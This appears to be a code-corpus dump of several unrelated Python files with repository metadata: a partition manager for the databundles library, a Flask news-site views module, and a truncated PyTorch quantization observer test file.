] | permissive | YaminiHP/SimilitudeApp | 8cbde52caec3c19d5fa73508fc005f38f79b8418 | 005c59894d8788c97be16ec420c0a43aaec99b80 | refs/heads/master | 2023-06-27T00:03:00.404080 | 2021-07-25T17:51:27 | 2021-07-25T17:51:27 | 389,390,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:0ba80a661465f023b9da7444cd18a123358f4112509665b5d25721a9fb176ec0
size 14535
| [
"[email protected]"
] | |
11942764d3444e239ed6702bca9c874ab630237e | f41bd639f249ef6029e310bee84c6ef03f5d6f19 | /databundles/partitions.py | b4ecea0136dac5ddfa498ccb0c0969a76a298626 | [] | no_license | kball/databundles | 5e3d478c1977a0481d77131dd573c8f199e2c95d | 142f20705c8be6cb136adef3a94c8fa7b7119b88 | refs/heads/master | 2021-01-21T03:30:32.822333 | 2014-01-23T23:57:57 | 2014-01-23T23:57:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,722 | py | """Access classess and identity for partitions.
Copyright (c) 2013 Clarinova. This file is licensed under the terms of the
Revised BSD License, included in this distribution as LICENSE.txt
"""
import os
from partition import PartitionIdentity
from sqlalchemy.orm.exc import NoResultFound
class Partitions(object):
'''Container and manager for the set of partitions.
This object is always accessed from Bundle.partitions.
'''
def __init__(self, bundle):
self.bundle = bundle
def partition(self, arg, **kwargs):
'''Get a local partition object from either a Partition ORM object, or
a partition name
Arguments:
arg -- an orm.Partition or Partition object.
'''
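# Illustrative call patterns for this method (the id string below is a made-up
# example, not an identifier from this library):
#   bundle.partitions.partition(orm_partition)   # an orm.Partition instance
#   bundle.partitions.partition('p1ab2c003')     # an id or vid string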
from databundles.orm import Partition as OrmPartition
from databundles.identity import PartitionNumber
from partition import PartitionIdentity
from sqlalchemy import or_
from sqlalchemy.util._collections import KeyedTuple
from partition import new_partition
session = self.bundle.database.session
if isinstance(arg,OrmPartition):
orm_partition = arg
elif isinstance(arg, basestring):
orm_partition = session.query(OrmPartition).filter(or_(OrmPartition.id_==arg,OrmPartition.vid==arg)).one()
elif isinstance(arg, PartitionNumber):
orm_partition = session.query(OrmPartition).filter(OrmPartition.id_==str(arg) ).one()
elif isinstance(arg, PartitionIdentity):
orm_partition = session.query(OrmPartition).filter(OrmPartition.id_==str(arg.id_) ).one()
else:
raise ValueError("Arg must be a Partition or PartitionNumber. Got {}".format(type(arg)))
return new_partition(self.bundle, orm_partition, **kwargs)
@property
def count(self):
from databundles.orm import Partition as OrmPartition
return (self.bundle.database.session.query(OrmPartition)
.filter(OrmPartition.d_vid == self.bundle.dataset.vid)).count()
@property
def all(self): #@ReservedAssignment
'''Return an iterator of all partitions'''
from databundles.orm import Partition as OrmPartition
import sqlalchemy.exc
try:
ds = self.bundle.dataset
q = (self.bundle.database.session.query(OrmPartition)
.filter(OrmPartition.d_vid == ds.vid)
.order_by(OrmPartition.vid.asc())
.order_by(OrmPartition.segment.asc()))
return [self.partition(op) for op in q.all()]
except sqlalchemy.exc.OperationalError:
raise
return []
@property
def all_nocsv(self): #@ReservedAssignment
'''Return an iterator of all partitions, excluding CSV format partitions'''
from databundles.orm import Partition as OrmPartition
import sqlalchemy.exc
try:
ds = self.bundle.dataset
q = (self.bundle.database.session.query(OrmPartition)
.filter(OrmPartition.d_vid == ds.vid)
.filter(OrmPartition.format != 'csv')
.order_by(OrmPartition.vid.asc())
.order_by(OrmPartition.segment.asc()))
return [self.partition(op) for op in q.all()]
except sqlalchemy.exc.OperationalError:
raise
return []
def __iter__(self):
return iter(self.all)
def get(self, id_):
'''Get a partition by the id number
Arguments:
id_ -- a partition id value
Returns:
A partitions.Partition object
Throws:
a Sqlalchemy exception if the partition either does not exist or
is not unique
Because this method works on the bundle, it the id_ ( without version information )
is equivalent to the vid ( with version information )
'''
from databundles.orm import Partition as OrmPartition
from sqlalchemy import or_
if isinstance(id_, PartitionIdentity):
id_ = id_.identity.id_
s = self.bundle.database.session
q = (s
.query(OrmPartition)
.filter(or_(
OrmPartition.id_==str(id_).encode('ascii'),
OrmPartition.vid==str(id_).encode('ascii')
)))
try:
orm_partition = q.one()
return self.partition(orm_partition)
except NoResultFound:
orm_partition = None
if not orm_partition:
q = (s.query(OrmPartition)
.filter(OrmPartition.name==id_.encode('ascii')))
try:
orm_partition = q.one()
return self.partition(orm_partition)
except NoResultFound:
orm_partition = None
return orm_partition
def find_table(self, table_name):
'''Return the first partition that has the given table name'''
for partition in self.all:
if partition.table and partition.table.name == table_name:
return partition
return None
def find_id(self, id_):
'''Find a partition from an id or vid'''
from databundles.orm import Partition as OrmPartition
from sqlalchemy import or_
q = (self.bundle.database.session.query(OrmPartition)
.filter(or_(
OrmPartition.id_==str(id_).encode('ascii'),
OrmPartition.vid==str(id_).encode('ascii')
)))
return q.first()
def find(self, pid=None, use_library=False, **kwargs):
'''Return a Partition object from the database based on a PartitionId.
The object returned is immutable; changes are not persisted'''
import sqlalchemy.orm.exc
from identity import Identity
try:
if pid and not pid.format:
pid.format = Identity.ANY
elif not 'format' in kwargs:
kwargs['format'] = Identity.ANY
partitions = [ self.partition(op, memory=kwargs.get('memory',False))
for op in self._find_orm(pid, **kwargs).all()];
if len(partitions) == 1:
p = partitions.pop()
if use_library and not p.database.exists:
# Try to get it from the library, if it exists.
b = self.bundle.library.get(p.identity.vname)
if not b or not b.partition:
return p
else:
return b.partition
else:
return p
elif len(partitions) > 1 :
from databundles.dbexceptions import ResultCountError
rl = "; ".join([p.identity.vname for p in partitions])
raise ResultCountError("Got too many results: {}".format(rl))
else:
return None
except sqlalchemy.orm.exc.NoResultFound:
return None
def find_all(self, pid=None, **kwargs):
'''Return a Partition object from the database based on a PartitionId.
The object returned is immutable; changes are not persisted'''
from identity import Identity
if pid and not pid.format:
pid.format = Identity.ANY
elif not 'format' in kwargs:
kwargs['format'] = Identity.ANY
ops = self._find_orm(pid, **kwargs).all()
return [ self.partition(op) for op in ops]
def _pid_or_args_to_pid(self, bundle, pid, args):
from databundles.identity import Identity, new_identity
if isinstance(pid, Identity):
return pid, None
elif isinstance(pid,basestring):
return None, pid # pid is actually the name
elif args.get('name', False):
return None, args.get('name', None)
else:
return new_identity(args, bundle=bundle), None
def _find_orm(self, pid=None, **kwargs):
'''Return a Partition object from the database based on a PartitionId.
An ORM object is returned, so changes can be persisted. '''
import sqlalchemy.orm.exc
from databundles.identity import Identity
from databundles.orm import Partition as OrmPartition
pid, name = self._pid_or_args_to_pid(self.bundle, pid, kwargs)
q = self.bundle.database.session.query(OrmPartition)
if name is not None:
q = q.filter(OrmPartition.name==name)
else:
if pid.time is not Identity.ANY:
q = q.filter(OrmPartition.time==pid.time)
if pid.space is not Identity.ANY:
q = q.filter(OrmPartition.space==pid.space)
if pid.grain is not Identity.ANY:
q = q.filter(OrmPartition.grain==pid.grain)
if pid.format is not Identity.ANY:
q = q.filter(OrmPartition.format==pid.format)
if pid.segment is not Identity.ANY:
q = q.filter(OrmPartition.segment==pid.segment)
if pid.table is not Identity.ANY:
if pid.table is None:
q = q.filter(OrmPartition.t_id==None)
else:
tr = self.bundle.schema.table(pid.table)
if not tr:
raise ValueError("Didn't find table named {} in {} bundle path = {}".format(pid.table, pid.vname, self.bundle.database.path))
q = q.filter(OrmPartition.t_id==tr.id_)
ds = self.bundle.dataset
q = q.filter(OrmPartition.d_vid == ds.vid)
q = q.order_by(OrmPartition.vid.asc()).order_by(OrmPartition.segment.asc())
return q
def _new_orm_partition(self, pid, **kwargs):
'''Create a new ORM Partition object, or return one if
it already exists '''
from databundles.orm import Partition as OrmPartition, Table
session = self.bundle.database.session
if pid.table:
q =session.query(Table).filter( (Table.name==pid.table) | (Table.id_==pid.table) )
table = q.one()
else:
table = None
# 'tables' are additional tables that are part of the partition, beyond the one in the identity
# Probably a bad idea.
tables = kwargs.get('tables',kwargs.get('table',pid.table if pid else None))
if tables and not isinstance(tables, (list,tuple)):
tables = [tables]
if tables and pid and pid.table and pid.table not in tables:
tables = list(tables)
tables.append(pid.table)
data=kwargs.get('data',{})
data['tables'] = tables
d = pid.to_dict()
if not 'format' in d:
d['format'] = kwargs.get('format', 'db')
try: del d['table'] # OrmPartition requires t_id instead
except: pass
if 'dataset' in d:
del d['dataset']
# This code must have the session established in the context be active.
op = OrmPartition(
self.bundle.get_dataset(session),
t_id = table.id_ if table else None,
data=data,
state=kwargs.get('state',None),
**d
)
session.add(op)
if not op.format:
raise Exception("Must have a format!")
return op
def clean(self, session):
from databundles.orm import Partition as OrmPartition
session.query(OrmPartition).delete()
def _new_partition(self, pid=None, session = None,**kwargs):
'''Creates a new OrmPartition record'''
with self.bundle.session:
pid, _ = self._pid_or_args_to_pid(self.bundle, pid, kwargs)
extant = self._find_orm(pid, **kwargs).all()
for p in extant:
if p.name == pid.name:
return self.partition(p)
op = self._new_orm_partition(pid, **kwargs)
# Return the partition from the managed session, which prevents the
# partition from being tied to a session that is closed.
return self.find(pid)
def new_partition(self, pid=None, **kwargs):
return self.new_db_partition( pid, **kwargs)
def new_db_partition(self, pid=None, **kwargs):
if pid:
pid.format = 'db'
else:
kwargs['format'] = 'db'
p = self._new_partition(pid, **kwargs)
p.create()
return p
def new_geo_partition(self, pid=None, **kwargs):
from sqlalchemy.orm.exc import NoResultFound
if pid:
pid.format = 'geo'
else:
kwargs['format'] = 'geo'
# We'll need to load a table from the shapefile, so that has to be created before
# we create the partition.
table_name = kwargs.get('table',pid.table if pid else None)
if not table_name:
raise ValueError("Pid must have a table name")
try:
self.bundle.schema.table(table_name)
except NoResultFound:
with self.bundle.session:
t = self.bundle.schema.add_table(table_name)
p = self._new_partition(pid, **kwargs)
if kwargs.get('shape_file'):
p.load_shapefile( kwargs.get('shape_file'), **kwargs)
return p
def new_hdf_partition(self, pid=None, **kwargs):
if pid:
pid.format = 'hdf'
else:
kwargs['format'] = 'hdf'
return self._new_partition(pid, **kwargs)
def new_csv_partition(self, pid=None, **kwargs):
if pid:
pid.format = 'csv'
else:
kwargs['format'] = 'csv'
return self._new_partition(pid, **kwargs)
def find_or_new(self, pid=None, clean = False, **kwargs):
return self.find_or_new_db(pid, clean = False, **kwargs)
def find_or_new_db(self, pid=None, clean = False, **kwargs):
'''Find a partition identified by pid, and if it does not exist, create it.
Args:
pid A partition Identity
tables String or array of tables to copy from the main partition
'''
if pid:
pid.format = 'db'
else:
kwargs['format'] = 'db'
try: partition = self.find(pid, **kwargs)
except: partition = None
if partition:
return partition
tables = kwargs.get('tables',kwargs.get('table',pid.table if pid else None))
if tables and not isinstance(tables, (list,tuple)):
tables = [tables]
if tables and pid and pid.table and pid.table not in tables:
tables.append(partition.identity.table)
partition = self._new_partition(pid, **kwargs)
if tables:
partition.create_with_tables(tables, clean)
else:
partition.create()
return partition;
def find_or_new_geo(self, pid=None, **kwargs):
'''Find a partition identified by pid, and if it does not exist, create it.
Args:
pid A partition Identity
tables String or array of tables to copy from the main partition
'''
if pid:
pid.format = 'geo'
else:
kwargs['format'] = 'geo'
try: partition = self.find(pid, **kwargs)
except: partition = None
if partition:
return partition
tables = kwargs.get('tables',kwargs.get('table',pid.table if pid else None))
if tables and not isinstance(tables, (list,tuple)):
tables = [tables]
if tables and pid and pid.table and pid.table not in tables:
tables.append(partition.identity.table)
partition = self.new_geo_partition(pid, **kwargs)
if tables:
partition.create_with_tables(tables)
else:
partition.create()
return partition;
def find_or_new_hdf(self, pid=None, **kwargs):
'''Find a partition identified by pid, and if it does not exist, create it.
Args:
pid A partition Identity
tables String or array of tables to copy from the main partition
'''
if pid:
pid.format = 'hdf'
else:
kwargs['format'] = 'hdf'
try: partition = self.find(pid, **kwargs)
except: partition = None
if partition:
return partition
partition = self.new_hdf_partition(pid, **kwargs)
return partition;
def find_or_new_csv(self, pid=None, **kwargs):
'''Find a partition identified by pid, and if it does not exist, create it.
Args:
pid A partition Identity
tables String or array of tables to copy from the main partition
'''
if pid:
pid.format = 'csv'
else:
kwargs['format'] = 'csv'
try: partition = self.find(pid, **kwargs)
except: partition = None
if partition:
return partition
partition = self.new_csv_partition(pid, **kwargs)
return partition;
def delete(self, partition):
from databundles.orm import Partition as OrmPartition
q = (self.bundle.database.session.query(OrmPartition)
.filter(OrmPartition.id_==partition.identity.id_))
q.delete()
| [
"[email protected]"
] | |
03c5e284066da9d303f45f391c6d39151fb59a4b | 6be2b9c3a7dcc95ed04ce8a5af912014833b769a | /app/main/views.py | 7bd0437c264b1feb1213cb896371a4b80751cd1f | [
"MIT"
] | permissive | MaryMbugua/Newshighlighttwo | 05219428c9e568122cb59f7a2ea90b758edf8c76 | 143fd75b7c0e36a48e25240ff150d10781c77470 | refs/heads/master | 2020-03-08T19:47:28.086076 | 2018-04-23T08:50:25 | 2018-04-23T08:50:25 | 128,363,872 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,157 | py | from flask import render_template,request,redirect,url_for
from . import main
from ..requests import get_sources,get_articles
from ..models import Newsarticle,Newssources
#views
@main.route('/')
def index():
'''
view root page function that returns the index page and its data
'''
title = 'Home - Welcome to The best News Update Website Online'
return render_template('index.html',title = title)
@main.route('/Business/')
def BusinessSources():
'''
view page function that returns business news from various news sources
'''
business_sources = get_sources('business')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('biz.html',title = title,biznews = business_sources)
@main.route('/Entertainment/')
def EntertainmentSources():
'''
view page function that returns entertainment news from various news sources
'''
entertainment_sources = get_sources('entertainment')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('enta.html',title = title,enta = entertainment_sources)
@main.route('/Health/')
def HealthSources():
'''
view page function that returns health news from various news sources
'''
health_sources = get_sources('health')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('health.html',title = title,healthsource = health_sources)
@main.route('/General/')
def GeneralSources():
'''
view page function that returns general news from various news sources
'''
general_sources = get_sources('general')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('gen.html',title = title,general = general_sources)
@main.route('/Science/')
def ScienceSources():
'''
view page function that returns science news from various news sources
'''
science_sources = get_sources('science')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('science.html',title = title,science = science_sources)
@main.route('/Sports/')
def SportsSources():
'''
view page function that returns sports news from various news sources
'''
sports_sources = get_sources('sports')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('sports.html',title = title,sports = sports_sources)
@main.route('/Technology/')
def TechnologySources():
'''
view page function that returns technology news from various news sources
'''
technology_sources = get_sources('technology')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('tech.html',title = title,tech = technology_sources)
@main.route('/source/<id>/')
def NewsGetArticles(id):
'''
view page function that returns news articles from the selected news source
'''
news = get_articles(id)
title = 'Home - Welcome to The best News Update Website Online'
return render_template('article.html',title = title,news=news) | [
"[email protected]"
] | |
aa49d86c34cb6af174c81aed810cf64c87dfa51a | 5b1cd15a172e5a458f60506c76c8a303656f6a4c | /test/quantization/test_workflow_module.py | 5e0b3e2db6d66e8d8540246746bd4ef2e7dce193 | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | georgeSkoumas/pytorch | 8350b446968a3dc6ed0eccacdffafae60bc1d17b | d39cb84f1fffbb9a1b909be7b203e673c046cca1 | refs/heads/master | 2022-12-01T21:53:49.847675 | 2020-08-13T12:11:44 | 2020-08-13T12:14:21 | 287,285,967 | 1 | 0 | NOASSERTION | 2020-08-13T13:21:15 | 2020-08-13T13:21:15 | null | UTF-8 | Python | false | false | 69,044 | py | # Torch
import torch
from torch.quantization import (
MinMaxObserver,
PerChannelMinMaxObserver,
MovingAverageMinMaxObserver,
MovingAveragePerChannelMinMaxObserver,
MinMaxDynamicQuantObserver,
HistogramObserver,
RecordingObserver,
FakeQuantize,
default_debug_qconfig,
default_observer,
default_per_channel_weight_observer,
get_observer_dict,
prepare,
)
from torch.quantization._learnable_fake_quantize import (
_LearnableFakeQuantizePerTensorOp,
_LearnableFakeQuantizePerChannelOp
)
import torch.nn as nn
# Standard library
import copy
import io
import unittest
import math
import numpy as np
# Testing utils
from hypothesis import given, settings
from hypothesis import strategies as st
import torch.testing._internal.hypothesis_utils as hu
hu.assert_deadline_disabled()
from torch.testing._internal.common_cuda import TEST_MULTIGPU, TEST_CUDA
from torch.testing._internal.common_utils import TestCase
from torch.testing._internal.common_quantization import (
QuantizationTestCase,
AnnotatedSingleLayerLinearModel,
test_only_eval_fn,
)
from torch.testing._internal.common_quantized import (
override_quantized_engine,
supported_qengines,
override_qengines,
)
# Reference method for fake quantize
def _fake_quantize_per_tensor_affine_reference(X, scale, zero_point, quant_min, quant_max):
res = (torch.clamp(torch.round(X * (1.0 / scale) + zero_point), quant_min, quant_max) - zero_point) * scale
return res
# Reference method for the gradient of the fake quantize operator
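# (This reference is a straight-through estimator: the upstream gradient dY passes
# through wherever the quantized value stays inside [quant_min, quant_max] and is
# zeroed where the value clamps.)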
def _fake_quantize_per_tensor_affine_grad_reference(dY, X, scale, zero_point, quant_min, quant_max):
Xq = torch.round(X * (1.0 / scale) + zero_point)
mask = (Xq >= quant_min) * (Xq <= quant_max)
res = torch.zeros_like(dY)
res[mask] = dY[mask]
return res
# Reference method for the gradients of the fake quantize operator
def _fake_quantize_learnable_per_tensor_affine_grad_reference(dY, X, scale, zero_point, quant_min, quant_max, device):
r"""This method references the following literatures for back propagation on scale and zero point.
- https://arxiv.org/pdf/1902.08153.pdf
- https://arxiv.org/pdf/1903.08066.pdf
"""
zero_point_rounded = int((zero_point + 0.5).clamp(quant_min, quant_max).item())
Xq = torch.round(X * (1.0 / scale) + zero_point_rounded).clamp(quant_min, quant_max)
Xfq = (Xq - zero_point_rounded) * scale
indicate_small_scale = (Xq == quant_min).float().to(device)
indicate_big_scale = (Xq == quant_max).float().to(device)
indicate_middle_scale = torch.ones(indicate_small_scale.shape).to(device) - \
indicate_small_scale - indicate_big_scale
indicate_saturate_zp = ((Xq == quant_min).float() + (Xq == quant_max).float()).to(device)
indicate_unsaturate_zp = torch.ones(indicate_saturate_zp.shape).to(device) - indicate_saturate_zp
grad_small_scale = quant_min - zero_point_rounded
grad_big_scale = quant_max - zero_point_rounded
grad_middle_scale = ((Xfq - X) / scale).to(device)
grad_saturate_zp = -scale.to(device)
grad_unsaturate_zp = 0
grad_scale = indicate_small_scale * grad_small_scale + \
indicate_big_scale * grad_big_scale + \
indicate_middle_scale * grad_middle_scale
grad_zp = indicate_saturate_zp * grad_saturate_zp + \
indicate_unsaturate_zp * grad_unsaturate_zp
grad_X = _fake_quantize_per_tensor_affine_grad_reference(
dY, X, scale, zero_point, quant_min, quant_max).to(device)
grad_scale = (grad_scale * dY).sum().unsqueeze(dim=0)
grad_zp = (grad_zp * dY).sum().unsqueeze(dim=0)
return grad_X, grad_scale, grad_zp
# Helper function used to simulate per-channel fake-quant against any axis
def _permute_to_axis_zero(X, axis):
new_axis_list = list(range(X.dim()))
new_axis_list[axis] = 0
new_axis_list[0] = axis
y = X.permute(tuple(new_axis_list))
return y, new_axis_list
# Reference method for fake quantize
def _fake_quantize_per_channel_affine_reference(X, per_channel_scale, per_channel_zero_point, axis, quant_min, quant_max):
X, permute_axis_list = _permute_to_axis_zero(X, axis)
res = torch.zeros_like(X)
for i in range(X.size()[0]):
res[i] = (torch.clamp(torch.round(X[i] * (1.0 / per_channel_scale[i]) +
per_channel_zero_point[i]), quant_min, quant_max) - per_channel_zero_point[i]) * per_channel_scale[i]
out = res.permute(tuple(permute_axis_list))
return out
# Reference method for the gradient of the fake quantize operator
def _fake_quantize_per_channel_affine_grad_reference(dY, X, per_channel_scale, per_channel_zero_point, axis, quant_min, quant_max):
X, permute_axis_list = _permute_to_axis_zero(X, axis)
Xq = torch.zeros_like(X)
for i in range(X.size()[0]):
Xq[i] = torch.round(X[i] * (1.0 / per_channel_scale[i]) + per_channel_zero_point[i])
Xq = Xq.permute(tuple(permute_axis_list))
mask = (Xq >= quant_min) * (Xq <= quant_max)
res = torch.zeros_like(dY)
res[mask] = dY[mask]
return res
# Reference method for quantization.
def _quantize_per_tensor(x, scale, zero_point, quant_min, quant_max):
return ((x / scale) + zero_point).round().clamp(quant_min, quant_max)
# Reference method for the per channel gradients of the learnable fake quantize operator
def _fake_quantize_learnable_per_channel_affine_grad_reference(
dY, X, per_channel_scale, per_channel_zero_point, axis, quant_min, quant_max, device):
r"""This method references the following literatures for back propagation on scale and zero point.
- https://arxiv.org/pdf/1902.08153.pdf
- https://arxiv.org/pdf/1903.08066.pdf
"""
grad_X = _fake_quantize_per_channel_affine_grad_reference(
dY, X, per_channel_scale, per_channel_zero_point, axis, quant_min, quant_max).to(device)
per_channel_scale = per_channel_scale.detach().type(torch.float)
per_channel_zero_point = ((per_channel_zero_point.detach() + 0.5).clamp(quant_min, quant_max)).type(torch.int64)
grad_scale = torch.zeros([per_channel_scale.size(0)]).to(device)
grad_zero_point = torch.zeros([per_channel_zero_point.size(0)]).to(device)
X_flattened = torch.unbind(X, dim=axis)
dY_flattened = torch.unbind(dY, dim=axis)
for i, X_i in enumerate(torch.unbind(X, dim=axis), 0):
scale_i = per_channel_scale[i]
zero_point_i = per_channel_zero_point[i]
X_i = X_flattened[i]
dY_i = dY_flattened[i]
Xq_i = _quantize_per_tensor(
X_i, scale_i, zero_point_i, quant_min, quant_max).to(device)
Xfq_i = (Xq_i - zero_point_i) * scale_i
indicate_small_scale_i = (Xq_i == quant_min).float().to(device)
indicate_big_scale_i = (Xq_i == quant_max).float().to(device)
indicate_middle_scale_i = torch.ones(indicate_small_scale_i.shape).to(device) - \
indicate_small_scale_i - indicate_big_scale_i
indicate_saturate_zp_i = ((Xq_i == quant_min).float() +
(Xq_i == quant_max).float()).to(device)
indicate_unsaturate_zp_i = torch.ones(indicate_saturate_zp_i.shape).to(device) - \
indicate_saturate_zp_i
grad_small_scale_i = quant_min - zero_point_i
grad_big_scale_i = quant_max - zero_point_i
grad_middle_scale_i = ((Xfq_i - X_i) / scale_i).to(device)
grad_saturate_zp_i = -scale_i.to(device)
grad_unsaturate_zp_i = 0
grad_scale_i = indicate_small_scale_i * grad_small_scale_i + \
indicate_middle_scale_i * grad_middle_scale_i + \
indicate_big_scale_i * grad_big_scale_i
grad_zp_i = indicate_saturate_zp_i * grad_saturate_zp_i + \
indicate_unsaturate_zp_i * grad_unsaturate_zp_i
grad_scale_i = (grad_scale_i * dY_i).sum().unsqueeze(dim=0)
grad_zp_i = (grad_zp_i * dY_i).sum().unsqueeze(dim=0)
grad_scale[i] = grad_scale_i
grad_zero_point[i] = grad_zp_i
return grad_X, grad_scale, grad_zero_point
def to_tensor(X, device):
return torch.tensor(X).to(device=torch.device(device), dtype=torch.float32)
NP_RANDOM_SEED = 19
tolerance = 1e-6
class TestObserver(QuantizationTestCase):
@given(qdtype=st.sampled_from((torch.qint8, torch.quint8)),
qscheme=st.sampled_from((torch.per_tensor_affine, torch.per_tensor_symmetric)),
reduce_range=st.booleans())
def test_per_tensor_observers(self, qdtype, qscheme, reduce_range):
# reduce_range cannot be true for symmetric quantization with uint8
if qdtype == torch.quint8 and qscheme == torch.per_tensor_symmetric:
reduce_range = False
ObserverList = [MinMaxObserver(dtype=qdtype, qscheme=qscheme, reduce_range=reduce_range),
MovingAverageMinMaxObserver(averaging_constant=0.5,
dtype=qdtype,
qscheme=qscheme,
reduce_range=reduce_range)]
for myobs in ObserverList:
# Calculate Qparams should return with a warning for observers with no data
qparams = myobs.calculate_qparams()
if type(myobs) == MinMaxObserver:
x = torch.tensor([1.0, 2.0, 2.0, 3.0, 4.0, 5.0, 6.0])
y = torch.tensor([4.0, 5.0, 5.0, 6.0, 7.0, 8.0])
else:
# Moving average of min/max for x and y matches that of
# extreme values for x/y used for minmax observer
x = torch.tensor([0.0, 2.0, 2.0, 3.0, 4.0, 5.0, 6.0])
y = torch.tensor([2.0, 5.0, 5.0, 6.0, 7.0, 10.0])
result = myobs(x)
result = myobs(y)
self.assertEqual(result, y)
self.assertEqual(myobs.min_val, 1.0)
self.assertEqual(myobs.max_val, 8.0)
qparams = myobs.calculate_qparams()
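# The reference values below follow from min_val=1.0, max_val=8.0 (a sketch of the
# arithmetic, assuming the observer widens the range to include 0):
#   affine:    scale = (8 - 0) / 255 ~= 0.0313725
#   symmetric: scale = 2 * max(|min|, |max|) / 255 = 16 / 255 ~= 0.062745
# and reduce_range shrinks the quantized range to 127 steps, hence the 255 / 127 factor.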
if reduce_range:
if qscheme == torch.per_tensor_symmetric:
ref_scale = 0.062745 * 255 / 127
ref_zero_point = 0 if qdtype is torch.qint8 else 128
else:
ref_scale = 0.0313725 * 255 / 127
ref_zero_point = -64 if qdtype is torch.qint8 else 0
else:
if qscheme == torch.per_tensor_symmetric:
ref_scale = 0.062745
ref_zero_point = 0 if qdtype is torch.qint8 else 128
else:
ref_scale = 0.0313725
ref_zero_point = -128 if qdtype is torch.qint8 else 0
self.assertEqual(qparams[1].item(), ref_zero_point)
self.assertEqual(qparams[0].item(), ref_scale, atol=1e-5, rtol=0)
state_dict = myobs.state_dict()
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_dict[key])
loaded_obs = MinMaxObserver(dtype=qdtype, qscheme=qscheme, reduce_range=reduce_range)
loaded_obs.load_state_dict(loaded_dict)
loaded_qparams = loaded_obs.calculate_qparams()
self.assertEqual(myobs.min_val, loaded_obs.min_val)
self.assertEqual(myobs.max_val, loaded_obs.max_val)
self.assertEqual(myobs.calculate_qparams(), loaded_obs.calculate_qparams())
@given(X=hu.tensor(shapes=hu.array_shapes(min_dims=2, max_dims=4,
min_side=1, max_side=10),
qparams=hu.qparams()),
reduce_range=st.booleans())
def test_per_tensor_dynamic_quant_observers(self, X, reduce_range):
X, (scale, zero_point, torch_type) = X
x = torch.from_numpy(X)
obs = MinMaxDynamicQuantObserver(dtype=torch.quint8, reduce_range=reduce_range)
result = obs(x)
qparams = obs.calculate_qparams()
ref = torch._choose_qparams_per_tensor(x, reduce_range)
self.assertEqual(ref[0], qparams[0])
self.assertEqual(ref[1], qparams[1])
@given(qdtype=st.sampled_from((torch.qint8, torch.quint8)),
qscheme=st.sampled_from((torch.per_channel_affine, torch.per_channel_symmetric)),
ch_axis=st.sampled_from((0, 1, 2, 3)), reduce_range=st.booleans())
def test_per_channel_observers(self, qdtype, qscheme, ch_axis, reduce_range):
# reduce_range cannot be true for symmetric quantization with uint8
if qdtype == torch.quint8 and qscheme == torch.per_channel_symmetric:
reduce_range = False
ObserverList = [PerChannelMinMaxObserver(reduce_range=reduce_range,
ch_axis=ch_axis,
dtype=qdtype,
qscheme=qscheme),
MovingAveragePerChannelMinMaxObserver(averaging_constant=0.5,
reduce_range=reduce_range,
ch_axis=ch_axis,
dtype=qdtype,
qscheme=qscheme)]
for myobs in ObserverList:
# Calculate qparams should work for empty observers
qparams = myobs.calculate_qparams()
x = torch.tensor(
[
[[[1.0, 2.0], [2.0, 2.5]], [[3.0, 4.0], [4.5, 6.0]]],
[[[-4.0, -3.0], [5.0, 5.0]], [[6.0, 3.0], [7.0, 8.0]]],
]
)
if type(myobs) == MovingAveragePerChannelMinMaxObserver:
# Scaling the input tensor to model change in min/max values
# across batches
result = myobs(0.5 * x)
result = myobs(1.5 * x)
self.assertEqual(result, 1.5 * x)
else:
result = myobs(x)
self.assertEqual(result, x)
qparams = myobs.calculate_qparams()
ref_min_vals = [[1.0, -4.0], [-4.0, 3.0], [-4.0, 2.0], [-4.0, -3.0]]
ref_max_vals = [[6.0, 8.0], [5.0, 8.0], [6.0, 8.0], [7.0, 8.0]]
per_channel_symmetric_ref_scales = [
[0.04705882, 0.06274509],
[0.03921569, 0.0627451],
[0.04705882, 0.0627451],
[0.05490196, 0.0627451],
]
per_channel_affine_ref_scales = [
[0.02352941, 0.04705882],
[0.03529412, 0.03137255],
[0.03921569, 0.03137255],
[0.04313726, 0.04313726],
]
per_channel_affine_qint8_zp = [
[-128, -43],
[-15, -128],
[-26, -128],
[-35, -58],
]
per_channel_affine_quint8_zp = [[0, 85], [113, 0], [102, 0], [93, 70]]
self.assertEqual(myobs.min_vals, ref_min_vals[ch_axis])
self.assertEqual(myobs.max_vals, ref_max_vals[ch_axis])
if qscheme == torch.per_channel_symmetric:
ref_scales = per_channel_symmetric_ref_scales[ch_axis]
ref_zero_points = [0, 0] if qdtype is torch.qint8 else [128, 128]
else:
ref_scales = per_channel_affine_ref_scales[ch_axis]
ref_zero_points = (
per_channel_affine_qint8_zp[ch_axis]
if qdtype is torch.qint8
else per_channel_affine_quint8_zp[ch_axis]
)
if reduce_range:
ref_scales = [s * 255 / 127 for s in ref_scales]
ref_zero_points = [math.floor(z / 2) for z in ref_zero_points]
self.assertTrue(torch.allclose(qparams[0], torch.tensor(ref_scales, dtype=qparams[0].dtype)))
self.assertTrue(torch.allclose(qparams[1], torch.tensor(ref_zero_points, dtype=qparams[1].dtype)))
# Test for serializability
state_dict = myobs.state_dict()
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_dict[key])
loaded_obs = PerChannelMinMaxObserver(reduce_range=reduce_range, ch_axis=ch_axis, dtype=qdtype, qscheme=qscheme)
loaded_obs.load_state_dict(loaded_dict)
loaded_qparams = loaded_obs.calculate_qparams()
self.assertEqual(myobs.min_vals, loaded_obs.min_vals)
self.assertEqual(myobs.max_vals, loaded_obs.max_vals)
self.assertEqual(myobs.calculate_qparams(), loaded_obs.calculate_qparams())
def test_observer_scriptable(self):
obs_list = [MinMaxObserver(), MovingAverageMinMaxObserver(), MinMaxDynamicQuantObserver()]
for obs in obs_list:
scripted = torch.jit.script(obs)
